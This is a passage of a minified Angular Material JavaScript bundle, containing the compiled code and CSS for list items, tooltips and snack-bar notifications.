.mat-list-option .mat-divider{margin-left:auto;margin-right:0}.mat-list-base[dense] .mat-list-item .mat-divider.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-divider.mat-divider-inset{position:absolute}.mat-nav-list a{text-decoration:none;color:inherit}.mat-nav-list .mat-list-item{cursor:pointer;outline:none}mat-action-list .mat-list-item{cursor:pointer;outline:inherit}.mat-list-option:not(.mat-list-item-disabled){cursor:pointer;outline:none}.mat-list-item-disabled{pointer-events:none}.cdk-high-contrast-active .mat-list-item-disabled{opacity:.5}.cdk-high-contrast-active :host .mat-list-item-disabled{opacity:.5}.cdk-high-contrast-active .mat-list-option:hover,.cdk-high-contrast-active .mat-nav-list .mat-list-item:hover,.cdk-high-contrast-active mat-action-list .mat-list-item:hover{outline:dotted 1px;z-index:1}.cdk-high-contrast-active .mat-list-single-selected-option::after{content:"";position:absolute;top:50%;right:16px;transform:translateY(-50%);width:10px;height:0;border-bottom:solid 10px;border-radius:10px}.cdk-high-contrast-active [dir=rtl] .mat-list-single-selected-option::after{right:auto;left:16px}@media(hover: none){.mat-list-option:not(.mat-list-single-selected-option):not(.mat-list-item-disabled):hover,.mat-nav-list .mat-list-item:not(.mat-list-item-disabled):hover,.mat-action-list .mat-list-item:not(.mat-list-item-disabled):hover{background:none}}'],encapsulation:2,changeDetection:0}),t})(),$F=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-list-avatar",""],["","matListAvatar",""]],hostAttrs:[1,"mat-list-avatar"]}),t})(),Lr=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-list-icon",""],["","matListIcon",""]],hostAttrs:[1,"mat-list-icon"]}),t})(),rc=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-subheader",""],["","matSubheader",""]],hostAttrs:[1,"mat-subheader"]}),t})(),ts=(()=>{class t extends a1e{constructor(e,i,n,r){super(),this._element=e,this._isInteractiveList=!1,this._destroyed=new J,this._disabled=!1,this._isInteractiveList=!!(n||r&&"action-list"===r._getListType()),this._list=n||r;const c=this._getHostElement();"button"===c.nodeName.toLowerCase()&&!c.hasAttribute("type")&&c.setAttribute("type","button"),this._list&&this._list._stateChanges.pipe(ea(this._destroyed)).subscribe(()=>{i.markForCheck()})}get disabled(){return this._disabled||!(!this._list||!this._list.disabled)}set disabled(e){this._disabled=wi(e)}ngAfterContentInit(){!function MW(t,a,e="mat"){t.changes.pipe(Ro(t)).subscribe(({length:i})=>{eb(a,`${e}-2-line`,!1),eb(a,`${e}-3-line`,!1),eb(a,`${e}-multi-line`,!1),2===i||3===i?eb(a,`${e}-${i}-line`,!0):i>3&&eb(a,`${e}-multi-line`,!0)})}(this._lines,this._element)}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_isRippleDisabled(){return!this._isInteractiveList||this.disableRipple||!(!this._list||!this._list.disableRipple)}_getHostElement(){return this._element.nativeElement}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(n1e,8),Ee(QF,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-list-item"],["a","mat-list-item",""],["button","mat-list-item",""]],contentQueries:function(e,i,n){if(1&e&&(ha(n,$F,5),ha(n,Lr,5),ha(n,Or,5)),2&e){let r;Vt(r=Bt())&&(i._avatar=r.first),Vt(r=Bt())&&(i._icon=r.first),Vt(r=Bt())&&(i._lines=r)}},hostAttrs:[1,"mat-list-item","mat-focus-indicator"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-list-item-disabled",i.disabled)("mat-list-item-with-avatar",i._avatar||i._icon)},inputs:{disableRipple:"disableRipple",disabled:"disabled"},exportAs:["matListItem"],features:[ci],ngContentSelectors:Y0e,decls:6,vars:2,consts:[[1,"mat-list-item-content"],["mat-ripple","",1,"mat-list-item-ripple",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-list-text"]],template:function(e,i){1&e&&(Jn(X0e),m(0,"span",0),it(1,"span",1),va(2),m(3,"span",2),va(4,1),u(),va(5,2),u()),2&e&&(C(1),V("matRippleTrigger",i._getHostElement())("matRippleDisabled",i._isRippleDisabled()))},dependencies:[xl],encapsulation:2,changeDetection:0}),t})(),XF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[vW,Pd,la,Qw,rn,vW,la,Qw,u8]}),t})();const d1e=["tooltip"],YF="tooltip-panel",JF=ym({passive:!0}),ZF=new ni("mat-tooltip-scroll-strategy"),f1e={provide:ZF,deps:[vs],useFactory:function h1e(t){return()=>t.scrollStrategies.reposition({scrollThrottle:20})}},p1e=new ni("mat-tooltip-default-options",{providedIn:"root",factory:function _1e(){return{showDelay:0,hideDelay:0,touchendHideDelay:1500}}});let g1e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this._overlay=e,this._elementRef=i,this._scrollDispatcher=n,this._viewContainerRef=r,this._ngZone=c,this._platform=d,this._ariaDescriber=T,this._focusMonitor=k,this._dir=Y,this._defaultOptions=te,this._position="below",this._disabled=!1,this._viewInitialized=!1,this._pointerExitEventsInitialized=!1,this._viewportMargin=8,this._cssClassPrefix="mat",this._showDelay=this._defaultOptions.showDelay,this._hideDelay=this._defaultOptions.hideDelay,this.touchGestures="auto",this._message="",this._passiveListeners=[],this._destroyed=new J,this._scrollStrategy=q,this._document=pe,te&&(te.position&&(this.position=te.position),te.touchGestures&&(this.touchGestures=te.touchGestures)),Y.change.pipe(ea(this._destroyed)).subscribe(()=>{this._overlayRef&&this._updatePosition(this._overlayRef)})}get position(){return this._position}set position(e){var i;e!==this._position&&(this._position=e,this._overlayRef&&(this._updatePosition(this._overlayRef),null===(i=this._tooltipInstance)||void 0===i||i.show(0),this._overlayRef.updatePosition()))}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._disabled?this.hide(0):this._setupPointerEnterEventsIfNeeded()}get showDelay(){return this._showDelay}set showDelay(e){this._showDelay=Uo(e)}get hideDelay(){return this._hideDelay}set hideDelay(e){this._hideDelay=Uo(e),this._tooltipInstance&&(this._tooltipInstance._mouseLeaveHideDelay=this._hideDelay)}get message(){return this._message}set message(e){this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this._message,"tooltip"),this._message=null!=e?String(e).trim():"",!this._message&&this._isTooltipVisible()?this.hide(0):(this._setupPointerEnterEventsIfNeeded(),this._updateTooltipMessage(),this._ngZone.runOutsideAngular(()=>{Promise.resolve().then(()=>{this._ariaDescriber.describe(this._elementRef.nativeElement,this.message,"tooltip")})}))}get tooltipClass(){return this._tooltipClass}set tooltipClass(e){this._tooltipClass=e,this._tooltipInstance&&this._setTooltipClass(this._tooltipClass)}ngAfterViewInit(){this._viewInitialized=!0,this._setupPointerEnterEventsIfNeeded(),this._focusMonitor.monitor(this._elementRef).pipe(ea(this._destroyed)).subscribe(e=>{e?"keyboard"===e&&this._ngZone.run(()=>this.show()):this._ngZone.run(()=>this.hide(0))})}ngOnDestroy(){const e=this._elementRef.nativeElement;clearTimeout(this._touchstartTimeout),this._overlayRef&&(this._overlayRef.dispose(),this._tooltipInstance=null),this._passiveListeners.forEach(([i,n])=>{e.removeEventListener(i,n,JF)}),this._passiveListeners.length=0,this._destroyed.next(),this._destroyed.complete(),this._ariaDescriber.removeDescription(e,this.message,"tooltip"),this._focusMonitor.stopMonitoring(e)}show(e=this.showDelay){var i;if(this.disabled||!this.message||this._isTooltipVisible())return void(null===(i=this._tooltipInstance)||void 0===i||i._cancelPendingAnimations());const n=this._createOverlay();this._detach(),this._portal=this._portal||new fp(this._tooltipComponent,this._viewContainerRef);const r=this._tooltipInstance=n.attach(this._portal).instance;r._triggerElement=this._elementRef.nativeElement,r._mouseLeaveHideDelay=this._hideDelay,r.afterHidden().pipe(ea(this._destroyed)).subscribe(()=>this._detach()),this._setTooltipClass(this._tooltipClass),this._updateTooltipMessage(),r.show(e)}hide(e=this.hideDelay){const i=this._tooltipInstance;i&&(i.isVisible()?i.hide(e):(i._cancelPendingAnimations(),this._detach()))}toggle(){this._isTooltipVisible()?this.hide():this.show()}_isTooltipVisible(){return!!this._tooltipInstance&&this._tooltipInstance.isVisible()}_createOverlay(){var e;if(this._overlayRef)return this._overlayRef;const i=this._scrollDispatcher.getAncestorScrollContainers(this._elementRef),n=this._overlay.position().flexibleConnectedTo(this._elementRef).withTransformOriginOn(`.${this._cssClassPrefix}-tooltip`).withFlexibleDimensions(!1).withViewportMargin(this._viewportMargin).withScrollableContainers(i);return n.positionChanges.pipe(ea(this._destroyed)).subscribe(r=>{this._updateCurrentPositionClass(r.connectionPair),this._tooltipInstance&&r.scrollableViewProperties.isOverlayClipped&&this._tooltipInstance.isVisible()&&this._ngZone.run(()=>this.hide(0))}),this._overlayRef=this._overlay.create({direction:this._dir,positionStrategy:n,panelClass:`${this._cssClassPrefix}-${YF}`,scrollStrategy:this._scrollStrategy()}),this._updatePosition(this._overlayRef),this._overlayRef.detachments().pipe(ea(this._destroyed)).subscribe(()=>this._detach()),this._overlayRef.outsidePointerEvents().pipe(ea(this._destroyed)).subscribe(()=>{var r;return null===(r=this._tooltipInstance)||void 0===r?void 0:r._handleBodyInteraction()}),this._overlayRef.keydownEvents().pipe(ea(this._destroyed)).subscribe(r=>{this._isTooltipVisible()&&27===r.keyCode&&!Zr(r)&&(r.preventDefault(),r.stopPropagation(),this._ngZone.run(()=>this.hide(0)))}),!(null===(e=this._defaultOptions)||void 0===e)&&e.disableTooltipInteractivity&&this._overlayRef.addPanelClass(`${this._cssClassPrefix}-tooltip-panel-non-interactive`),this._overlayRef}_detach(){this._overlayRef&&this._overlayRef.hasAttached()&&this._overlayRef.detach(),this._tooltipInstance=null}_updatePosition(e){const i=e.getConfig().positionStrategy,n=this._getOrigin(),r=this._getOverlayPosition();i.withPositions([this._addOffset(Object.assign(Object.assign({},n.main),r.main)),this._addOffset(Object.assign(Object.assign({},n.fallback),r.fallback))])}_addOffset(e){return e}_getOrigin(){const e=!this._dir||"ltr"==this._dir.value,i=this.position;let n;"above"==i||"below"==i?n={originX:"center",originY:"above"==i?"top":"bottom"}:"before"==i||"left"==i&&e||"right"==i&&!e?n={originX:"start",originY:"center"}:("after"==i||"right"==i&&e||"left"==i&&!e)&&(n={originX:"end",originY:"center"});const{x:r,y:c}=this._invertPosition(n.originX,n.originY);return{main:n,fallback:{originX:r,originY:c}}}_getOverlayPosition(){const e=!this._dir||"ltr"==this._dir.value,i=this.position;let n;"above"==i?n={overlayX:"center",overlayY:"bottom"}:"below"==i?n={overlayX:"center",overlayY:"top"}:"before"==i||"left"==i&&e||"right"==i&&!e?n={overlayX:"end",overlayY:"center"}:("after"==i||"right"==i&&e||"left"==i&&!e)&&(n={overlayX:"start",overlayY:"center"});const{x:r,y:c}=this._invertPosition(n.overlayX,n.overlayY);return{main:n,fallback:{overlayX:r,overlayY:c}}}_updateTooltipMessage(){this._tooltipInstance&&(this._tooltipInstance.message=this.message,this._tooltipInstance._markForCheck(),this._ngZone.onMicrotaskEmpty.pipe(Cn(1),ea(this._destroyed)).subscribe(()=>{this._tooltipInstance&&this._overlayRef.updatePosition()}))}_setTooltipClass(e){this._tooltipInstance&&(this._tooltipInstance.tooltipClass=e,this._tooltipInstance._markForCheck())}_invertPosition(e,i){return"above"===this.position||"below"===this.position?"top"===i?i="bottom":"bottom"===i&&(i="top"):"end"===e?e="start":"start"===e&&(e="end"),{x:e,y:i}}_updateCurrentPositionClass(e){const{overlayY:i,originX:n,originY:r}=e;let c;if(c="center"===i?this._dir&&"rtl"===this._dir.value?"end"===n?"left":"right":"start"===n?"left":"right":"bottom"===i&&"top"===r?"above":"below",c!==this._currentPosition){const d=this._overlayRef;if(d){const T=`${this._cssClassPrefix}-${YF}-`;d.removePanelClass(T+this._currentPosition),d.addPanelClass(T+c)}this._currentPosition=c}}_setupPointerEnterEventsIfNeeded(){this._disabled||!this.message||!this._viewInitialized||this._passiveListeners.length||(this._platformSupportsMouseEvents()?this._passiveListeners.push(["mouseenter",()=>{this._setupPointerExitEventsIfNeeded(),this.show()}]):"off"!==this.touchGestures&&(this._disableNativeGesturesIfNecessary(),this._passiveListeners.push(["touchstart",()=>{this._setupPointerExitEventsIfNeeded(),clearTimeout(this._touchstartTimeout),this._touchstartTimeout=setTimeout(()=>this.show(),500)}])),this._addListeners(this._passiveListeners))}_setupPointerExitEventsIfNeeded(){if(this._pointerExitEventsInitialized)return;this._pointerExitEventsInitialized=!0;const e=[];if(this._platformSupportsMouseEvents())e.push(["mouseleave",i=>{var n;const r=i.relatedTarget;(!r||null===(n=this._overlayRef)||void 0===n||!n.overlayElement.contains(r))&&this.hide()}],["wheel",i=>this._wheelListener(i)]);else if("off"!==this.touchGestures){this._disableNativeGesturesIfNecessary();const i=()=>{clearTimeout(this._touchstartTimeout),this.hide(this._defaultOptions.touchendHideDelay)};e.push(["touchend",i],["touchcancel",i])}this._addListeners(e),this._passiveListeners.push(...e)}_addListeners(e){e.forEach(([i,n])=>{this._elementRef.nativeElement.addEventListener(i,n,JF)})}_platformSupportsMouseEvents(){return!this._platform.IOS&&!this._platform.ANDROID}_wheelListener(e){if(this._isTooltipVisible()){const i=this._document.elementFromPoint(e.clientX,e.clientY),n=this._elementRef.nativeElement;i!==n&&!n.contains(i)&&this.hide()}}_disableNativeGesturesIfNecessary(){const e=this.touchGestures;if("off"!==e){const i=this._elementRef.nativeElement,n=i.style;("on"===e||"INPUT"!==i.nodeName&&"TEXTAREA"!==i.nodeName)&&(n.userSelect=n.msUserSelect=n.webkitUserSelect=n.MozUserSelect="none"),("on"===e||!i.draggable)&&(n.webkitUserDrag="none"),n.touchAction="none",n.webkitTapHighlightColor="transparent"}}}return t.\u0275fac=function(e){pd()},t.\u0275dir=Ot({type:t,inputs:{position:["matTooltipPosition","position"],disabled:["matTooltipDisabled","disabled"],showDelay:["matTooltipShowDelay","showDelay"],hideDelay:["matTooltipHideDelay","hideDelay"],touchGestures:["matTooltipTouchGestures","touchGestures"],message:["matTooltip","message"],tooltipClass:["matTooltipClass","tooltipClass"]}}),t})(),Pa=(()=>{class t extends g1e{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){super(e,i,n,r,c,d,T,k,q,Y,te,pe),this._tooltipComponent=y1e}}return t.\u0275fac=function(e){return new(e||t)(Ee(vs),Ee(mi),Ee(By),Ee(fo),Ee(qi),Ee(sr),Ee(Pw),Ee(js),Ee(ZF),Ee(Cr,8),Ee(p1e,8),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","matTooltip",""]],hostAttrs:[1,"mat-tooltip-trigger"],exportAs:["matTooltip"],features:[ci]}),t})(),C1e=(()=>{class t{constructor(e,i){this._changeDetectorRef=e,this._closeOnInteraction=!1,this._isVisible=!1,this._onHide=new J,this._animationsDisabled="NoopAnimations"===i}show(e){clearTimeout(this._hideTimeoutId),this._showTimeoutId=setTimeout(()=>{this._toggleVisibility(!0),this._showTimeoutId=void 0},e)}hide(e){clearTimeout(this._showTimeoutId),this._hideTimeoutId=setTimeout(()=>{this._toggleVisibility(!1),this._hideTimeoutId=void 0},e)}afterHidden(){return this._onHide}isVisible(){return this._isVisible}ngOnDestroy(){this._cancelPendingAnimations(),this._onHide.complete(),this._triggerElement=null}_handleBodyInteraction(){this._closeOnInteraction&&this.hide(0)}_markForCheck(){this._changeDetectorRef.markForCheck()}_handleMouseLeave({relatedTarget:e}){(!e||!this._triggerElement.contains(e))&&(this.isVisible()?this.hide(this._mouseLeaveHideDelay):this._finalizeAnimation(!1))}_onShow(){}_handleAnimationEnd({animationName:e}){(e===this._showAnimation||e===this._hideAnimation)&&this._finalizeAnimation(e===this._showAnimation)}_cancelPendingAnimations(){clearTimeout(this._showTimeoutId),clearTimeout(this._hideTimeoutId),this._showTimeoutId=this._hideTimeoutId=void 0}_finalizeAnimation(e){e?this._closeOnInteraction=!0:this.isVisible()||this._onHide.next()}_toggleVisibility(e){const i=this._tooltip.nativeElement,n=this._showAnimation,r=this._hideAnimation;if(i.classList.remove(e?r:n),i.classList.add(e?n:r),this._isVisible=e,e&&!this._animationsDisabled&&"function"==typeof getComputedStyle){const c=getComputedStyle(i);("0s"===c.getPropertyValue("animation-duration")||"none"===c.getPropertyValue("animation-name"))&&(this._animationsDisabled=!0)}e&&this._onShow(),this._animationsDisabled&&(i.classList.add("_mat-animation-noopable"),this._finalizeAnimation(e))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(ir,8))},t.\u0275dir=Ot({type:t}),t})(),y1e=(()=>{class t extends C1e{constructor(e,i,n){super(e,n),this._breakpointObserver=i,this._isHandset=this._breakpointObserver.observe("(max-width: 599.98px) and (orientation: portrait), (max-width: 959.98px) and (orientation: landscape)"),this._showAnimation="mat-tooltip-show",this._hideAnimation="mat-tooltip-hide"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(O3),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tooltip-component"]],viewQuery:function(e,i){if(1&e&&Mi(d1e,7),2&e){let n;Vt(n=Bt())&&(i._tooltip=n.first)}},hostAttrs:["aria-hidden","true"],hostVars:2,hostBindings:function(e,i){1&e&&he("mouseleave",function(r){return i._handleMouseLeave(r)}),2&e&&ri("zoom",i.isVisible()?1:null)},features:[ci],decls:4,vars:6,consts:[[1,"mat-tooltip",3,"ngClass","animationend"],["tooltip",""]],template:function(e,i){if(1&e&&(m(0,"div",0,1),he("animationend",function(r){return i._handleAnimationEnd(r)}),oe(2,"async"),s(3),u()),2&e){let n;Ct("mat-tooltip-handset",null==(n=re(2,4,i._isHandset))?null:n.matches),V("ngClass",i.tooltipClass),C(3),ke(i.message)}},dependencies:[ag,Jv],styles:[".mat-tooltip{color:#fff;border-radius:4px;margin:14px;max-width:250px;padding-left:8px;padding-right:8px;overflow:hidden;text-overflow:ellipsis;transform:scale(0)}.mat-tooltip._mat-animation-noopable{animation:none;transform:scale(1)}.cdk-high-contrast-active .mat-tooltip{outline:solid 1px}.mat-tooltip-handset{margin:24px;padding-left:16px;padding-right:16px}.mat-tooltip-panel-non-interactive{pointer-events:none}@keyframes mat-tooltip-show{0%{opacity:0;transform:scale(0)}50%{opacity:.5;transform:scale(0.99)}100%{opacity:1;transform:scale(1)}}@keyframes mat-tooltip-hide{0%{opacity:1;transform:scale(1)}100%{opacity:0;transform:scale(1)}}.mat-tooltip-show{animation:mat-tooltip-show 200ms cubic-bezier(0, 0, 0.2, 1) forwards}.mat-tooltip-hide{animation:mat-tooltip-hide 100ms cubic-bezier(0, 0, 0.2, 1) forwards}"],encapsulation:2,changeDetection:0}),t})(),h8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[f1e],imports:[Xy,rn,bu,la,la,uu]}),t})();function b1e(t,a){if(1&t){const e=Ye();m(0,"div",2)(1,"button",3),he("click",function(){return be(e),Me(B().action())}),s(2),u()()}if(2&t){const e=B();C(2),ke(e.data.action)}}function M1e(t,a){}const eV=new ni("MatSnackBarData");class nA{constructor(){this.politeness="assertive",this.announcementMessage="",this.duration=0,this.data=null,this.horizontalPosition="center",this.verticalPosition="bottom"}}const v1e=Math.pow(2,31)-1;class f8{constructor(a,e){this._overlayRef=e,this._afterDismissed=new J,this._afterOpened=new J,this._onAction=new J,this._dismissedByAction=!1,this.containerInstance=a,a._onExit.subscribe(()=>this._finishDismiss())}dismiss(){this._afterDismissed.closed||this.containerInstance.exit(),clearTimeout(this._durationTimeoutId)}dismissWithAction(){this._onAction.closed||(this._dismissedByAction=!0,this._onAction.next(),this._onAction.complete(),this.dismiss()),clearTimeout(this._durationTimeoutId)}closeWithAction(){this.dismissWithAction()}_dismissAfter(a){this._durationTimeoutId=setTimeout(()=>this.dismiss(),Math.min(a,v1e))}_open(){this._afterOpened.closed||(this._afterOpened.next(),this._afterOpened.complete())}_finishDismiss(){this._overlayRef.dispose(),this._onAction.closed||this._onAction.complete(),this._afterDismissed.next({dismissedByAction:this._dismissedByAction}),this._afterDismissed.complete(),this._dismissedByAction=!1}afterDismissed(){return this._afterDismissed}afterOpened(){return this.containerInstance._onEnter}onAction(){return this._onAction}}let A1e=(()=>{class t{constructor(e,i){this.snackBarRef=e,this.data=i}action(){this.snackBarRef.dismissWithAction()}get hasAction(){return!!this.data.action}}return t.\u0275fac=function(e){return new(e||t)(Ee(f8),Ee(eV))},t.\u0275cmp=Wt({type:t,selectors:[["simple-snack-bar"]],hostAttrs:[1,"mat-simple-snackbar"],decls:3,vars:2,consts:[[1,"mat-simple-snack-bar-content"],["class","mat-simple-snackbar-action",4,"ngIf"],[1,"mat-simple-snackbar-action"],["mat-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"span",0),s(1),u(),ne(2,b1e,3,1,"div",1)),2&e&&(C(1),ke(i.data.message),C(1),V("ngIf",i.hasAction))},dependencies:[Ri,da],styles:[".mat-simple-snackbar{display:flex;justify-content:space-between;align-items:center;line-height:20px;opacity:1}.mat-simple-snackbar-action{flex-shrink:0;margin:-8px -8px -8px 8px}.mat-simple-snackbar-action button{max-height:36px;min-width:0}[dir=rtl] .mat-simple-snackbar-action{margin-left:-8px;margin-right:8px}.mat-simple-snack-bar-content{overflow:hidden;text-overflow:ellipsis}"],encapsulation:2,changeDetection:0}),t})();const T1e={snackBarState:ar("state",[sn("void, hidden",zi({transform:"scale(0.8)",opacity:0})),sn("visible",zi({transform:"scale(1)",opacity:1})),gn("* => visible",En("150ms cubic-bezier(0, 0, 0.2, 1)")),gn("* => void, * => hidden",En("75ms cubic-bezier(0.4, 0.0, 1, 1)",zi({opacity:0})))])};let E1e=(()=>{class t extends eA{constructor(e,i,n,r,c){super(),this._ngZone=e,this._elementRef=i,this._changeDetectorRef=n,this._platform=r,this.snackBarConfig=c,this._announceDelay=150,this._destroyed=!1,this._onAnnounce=new J,this._onExit=new J,this._onEnter=new J,this._animationState="void",this.attachDomPortal=d=>{this._assertNotAttached();const T=this._portalOutlet.attachDomPortal(d);return this._afterPortalAttached(),T},this._live="assertive"!==c.politeness||c.announcementMessage?"off"===c.politeness?"off":"polite":"assertive",this._platform.FIREFOX&&("polite"===this._live&&(this._role="status"),"assertive"===this._live&&(this._role="alert"))}attachComponentPortal(e){this._assertNotAttached();const i=this._portalOutlet.attachComponentPortal(e);return this._afterPortalAttached(),i}attachTemplatePortal(e){this._assertNotAttached();const i=this._portalOutlet.attachTemplatePortal(e);return this._afterPortalAttached(),i}onAnimationEnd(e){const{fromState:i,toState:n}=e;if(("void"===n&&"void"!==i||"hidden"===n)&&this._completeExit(),"visible"===n){const r=this._onEnter;this._ngZone.run(()=>{r.next(),r.complete()})}}enter(){this._destroyed||(this._animationState="visible",this._changeDetectorRef.detectChanges(),this._screenReaderAnnounce())}exit(){return this._ngZone.run(()=>{this._animationState="hidden",this._elementRef.nativeElement.setAttribute("mat-exit",""),clearTimeout(this._announceTimeoutId)}),this._onExit}ngOnDestroy(){this._destroyed=!0,this._completeExit()}_completeExit(){this._ngZone.onMicrotaskEmpty.pipe(Cn(1)).subscribe(()=>{this._ngZone.run(()=>{this._onExit.next(),this._onExit.complete()})})}_afterPortalAttached(){const e=this._elementRef.nativeElement,i=this.snackBarConfig.panelClass;i&&(Array.isArray(i)?i.forEach(n=>e.classList.add(n)):e.classList.add(i))}_assertNotAttached(){this._portalOutlet.hasAttached()}_screenReaderAnnounce(){this._announceTimeoutId||this._ngZone.runOutsideAngular(()=>{this._announceTimeoutId=setTimeout(()=>{const e=this._elementRef.nativeElement.querySelector("[aria-hidden]"),i=this._elementRef.nativeElement.querySelector("[aria-live]");if(e&&i){let n=null;this._platform.isBrowser&&document.activeElement instanceof HTMLElement&&e.contains(document.activeElement)&&(n=document.activeElement),e.removeAttribute("aria-hidden"),i.appendChild(e),null==n||n.focus(),this._onAnnounce.next(),this._onAnnounce.complete()}},this._announceDelay)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Ma),Ee(sr),Ee(nA))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&Mi(Cu,7),2&e){let n;Vt(n=Bt())&&(i._portalOutlet=n.first)}},features:[ci]}),t})(),D1e=(()=>{class t extends E1e{_afterPortalAttached(){super._afterPortalAttached(),"center"===this.snackBarConfig.horizontalPosition&&this._elementRef.nativeElement.classList.add("mat-snack-bar-center"),"top"===this.snackBarConfig.verticalPosition&&this._elementRef.nativeElement.classList.add("mat-snack-bar-top")}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["snack-bar-container"]],hostAttrs:[1,"mat-snack-bar-container"],hostVars:1,hostBindings:function(e,i){1&e&&GC("@state.done",function(r){return i.onAnimationEnd(r)}),2&e&&s1("@state",i._animationState)},features:[ci],decls:3,vars:2,consts:[["aria-hidden","true"],["cdkPortalOutlet",""]],template:function(e,i){1&e&&(m(0,"div",0),ne(1,M1e,0,0,"ng-template",1),u(),it(2,"div")),2&e&&(C(2),Rt("aria-live",i._live)("role",i._role))},dependencies:[Cu],styles:[".mat-snack-bar-container{border-radius:4px;box-sizing:border-box;display:block;margin:24px;max-width:33vw;min-width:344px;padding:14px 16px;min-height:48px;transform-origin:center}.cdk-high-contrast-active .mat-snack-bar-container{border:solid 1px}.mat-snack-bar-handset{width:100%}.mat-snack-bar-handset .mat-snack-bar-container{margin:8px;max-width:100%;min-width:0;width:100%}"],encapsulation:2,data:{animation:[T1e.snackBarState]}}),t})(),p8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[bu,yu,rn,hp,la,la]}),t})();const tV=new ni("mat-snack-bar-default-options",{providedIn:"root",factory:function x1e(){return new nA}});let w1e=(()=>{class t{constructor(e,i,n,r,c,d){this._overlay=e,this._live=i,this._injector=n,this._breakpointObserver=r,this._parentSnackBar=c,this._defaultConfig=d,this._snackBarRefAtThisLevel=null}get _openedSnackBarRef(){const e=this._parentSnackBar;return e?e._openedSnackBarRef:this._snackBarRefAtThisLevel}set _openedSnackBarRef(e){this._parentSnackBar?this._parentSnackBar._openedSnackBarRef=e:this._snackBarRefAtThisLevel=e}openFromComponent(e,i){return this._attach(e,i)}openFromTemplate(e,i){return this._attach(e,i)}open(e,i="",n){const r=Object.assign(Object.assign({},this._defaultConfig),n);return r.data={message:e,action:i},r.announcementMessage===e&&(r.announcementMessage=void 0),this.openFromComponent(this.simpleSnackBarComponent,r)}dismiss(){this._openedSnackBarRef&&this._openedSnackBarRef.dismiss()}ngOnDestroy(){this._snackBarRefAtThisLevel&&this._snackBarRefAtThisLevel.dismiss()}_attachSnackBarContainer(e,i){const r=Ko.create({parent:i&&i.viewContainerRef&&i.viewContainerRef.injector||this._injector,providers:[{provide:nA,useValue:i}]}),c=new fp(this.snackBarContainerComponent,i.viewContainerRef,r),d=e.attach(c);return d.instance.snackBarConfig=i,d.instance}_attach(e,i){const n=Object.assign(Object.assign(Object.assign({},new nA),this._defaultConfig),i),r=this._createOverlay(n),c=this._attachSnackBarContainer(r,n),d=new f8(c,r);if(e instanceof ho){const T=new Mm(e,null,{$implicit:n.data,snackBarRef:d});d.instance=c.attachTemplatePortal(T)}else{const T=this._createInjector(n,d),k=new fp(e,void 0,T),q=c.attachComponentPortal(k);d.instance=q.instance}return this._breakpointObserver.observe("(max-width: 599.98px) and (orientation: portrait)").pipe(ea(r.detachments())).subscribe(T=>{r.overlayElement.classList.toggle(this.handsetCssClass,T.matches)}),n.announcementMessage&&c._onAnnounce.subscribe(()=>{this._live.announce(n.announcementMessage,n.politeness)}),this._animateSnackBar(d,n),this._openedSnackBarRef=d,this._openedSnackBarRef}_animateSnackBar(e,i){e.afterDismissed().subscribe(()=>{this._openedSnackBarRef==e&&(this._openedSnackBarRef=null),i.announcementMessage&&this._live.clear()}),this._openedSnackBarRef?(this._openedSnackBarRef.afterDismissed().subscribe(()=>{e.containerInstance.enter()}),this._openedSnackBarRef.dismiss()):e.containerInstance.enter(),i.duration&&i.duration>0&&e.afterOpened().subscribe(()=>e._dismissAfter(i.duration))}_createOverlay(e){const i=new bg;i.direction=e.direction;let n=this._overlay.position().global();const r="rtl"===e.direction,c="left"===e.horizontalPosition||"start"===e.horizontalPosition&&!r||"end"===e.horizontalPosition&&r,d=!c&&"center"!==e.horizontalPosition;return c?n.left("0"):d?n.right("0"):n.centerHorizontally(),"top"===e.verticalPosition?n.top("0"):n.bottom("0"),i.positionStrategy=n,this._overlay.create(i)}_createInjector(e,i){return Ko.create({parent:e&&e.viewContainerRef&&e.viewContainerRef.injector||this._injector,providers:[{provide:f8,useValue:i},{provide:eV,useValue:e.data}]})}}return t.\u0275fac=function(e){return new(e||t)(At(vs),At(Nw),At(Ko),At(O3),At(t,12),At(tV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),I1e=(()=>{class t extends w1e{constructor(e,i,n,r,c,d){super(e,i,n,r,c,d),this.simpleSnackBarComponent=A1e,this.snackBarContainerComponent=D1e,this.handsetCssClass="mat-snack-bar-handset"}}return t.\u0275fac=function(e){return new(e||t)(At(vs),At(Nw),At(Ko),At(O3),At(t,12),At(tV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:p8}),t})();const R1e=["input"],S1e=function(t){return{enterDuration:t}},k1e=["*"],P1e=new ni("mat-slide-toggle-default-options",{providedIn:"root",factory:()=>({disableToggleValue:!1})});let O1e=0;const N1e={provide:Ls,useExisting:ja(()=>vg),multi:!0};class 